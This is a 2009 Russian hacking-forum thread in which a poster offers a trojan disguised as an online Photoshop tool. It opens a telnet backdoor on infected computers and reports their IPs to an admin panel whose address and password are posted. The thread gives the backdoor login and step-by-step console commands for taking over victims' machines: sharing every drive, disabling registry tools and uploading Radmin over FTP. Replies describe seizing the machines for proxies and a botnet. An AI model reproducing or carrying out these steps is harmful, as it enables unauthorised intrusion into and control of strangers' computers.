Форум АНТИЧАТ
Страница 1 из 3 1 2 3 >
Показывать 40 сообщений этой темы на одной странице

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)
-   Болталка (https://forum.antichat.xyz/forumdisplay.php?f=46)
-   -   Хотите пошалить в чужих компах на халяву? (Telnet) (https://forum.antichat.xyz/showthread.php?t=151611)

Vlad&slav 27.10.2009 19:04
Хотите пошалить в чужих компах на халяву? (Telnet)
 
Хотите пошалить в чужих компах на халяву? (Telnet)

Цитата:
Адрес: http://telnetlog.tk/

Логин: admin
Пароль: 123456000
В админке вы можете увидеть IP адреса ,
логин и пароль , порт 972(новые сверху)

Это данные для подключения к чужому компу.

Также вверху есть :
Цитата:
[ MAIN ] - Главная
[ INGECT ] - извлеч список IP адресов чтобы загрузить их куда либо (например хспайдер)
[ FAIL ] - это ссылка скачивания фаила самого вируса для открытия телнета, вирус замаскирован под онлайн фотошоп (ниже подробней)
[ PATCH ] - Превращение Win-xp-sp2 в сервер терминалов (или троян от Мелкомягких) подробней тут http://forum.antichat.ru/thread36042.html
Сам фаил вируса:
Его вы можете кинуть неприятелю или разослать где-либо. После этого в админке появится новый IP к которому вы сможете подключиться через телнет.
Также вирус прописывает себя в автозапуск и отстукивает IP при перезагрузке компа жертвы.

Админка сама очищяется через определённое время (внизу написано).

Отчёт с вирустотола http://dumpz.org/13735/ .

Как подключиться и что делать.
Пуск -> Выполнить -> Telnet

в нём пишим open 100.100.100.100 972
если соединение есть то у вас запросят логин и пароль
логин: suser
пароль: 123456 (когда вводите не отображается)

Появляется надпись:
PHP код:
*=====================================================
Вас приветствует Telnet-сервер производства корпорации Майкрософт
*=====================================================
C:>
Поздравляю, ты внутри, перед тобой консоль, с помощью которой ты можешь
управлять кампом, отдавая команды...
Можно к примеру расшарить диски:

PHP код:
C:>net share disk_c=c: > nul
C:>net share disk_d=d: > nul
C:>net share disk_e=e: > nul 
перезагрузить комп:
PHP код:
C:>shutdown --t 1 --
прописать какой-нибудь ключ реестра:
PHP код:
C:>reg add HKCUSoftwareMicrosoftWindowsCurrentVersionPoliciesSystem /v
DisableRegistryTools /t REG_DWORD /d 1 /
- который запретит доступ к нему

или поднять ftp сервер и залить радмина для более удобного удаленного
администрирования:
PHP код:
C:>ftp 
В общем-то, здесь уже играет фантазия взломщика =)


Делал для себя но пользуюсь мало. Пусть учатся новички работать с консолью. Если можно перенестите в релизы :)
icq 1000011101101111100110 в бинарной :D

http://s51.radikal.ru/i131/0910/7b/755d64362720.jpg
http://s56.radikal.ru/i152/0910/6e/311b7a0b1096.jpg
http://i009.radikal.ru/0910/6e/270a7e6c03ea.jpg

Nightmarе 27.10.2009 19:12
Спасибо тебе... за компы которые ты в открытую всем предоставил. щас пару штук возьму под соксы.

Iohid 27.10.2009 19:22
как определить у кого какой порт, или у всех 972

ultradron 27.10.2009 19:24
а как запустить эту консоль???

GRobbeRZ 27.10.2009 19:26
Цитата:
Сообщение от Iohid
как определить у кого какой порт, или у всех 972
+1

Aikaram 27.10.2009 19:31
Цитата:
Сообщение от GRobbeRZ
+1
= 973 :o

GRobbeRZ 27.10.2009 19:39
Ктонибуть пробовал?

Nightmarе 27.10.2009 19:41
Да пробую пробую, столько халявных внешних айпи давно не было. щас ботнет срочняк пополняю, мне внешки крайне необходимы.

-Unlocked- 27.10.2009 19:51
Ну вот. Типерь найтмер заддосит пинтагон. :(

Nuc7ear 27.10.2009 19:52
ой лажанулся ))


Время: 01:49
Страница 1 из 3 1 2 3 >
Показывать 40 сообщений этой темы на одной странице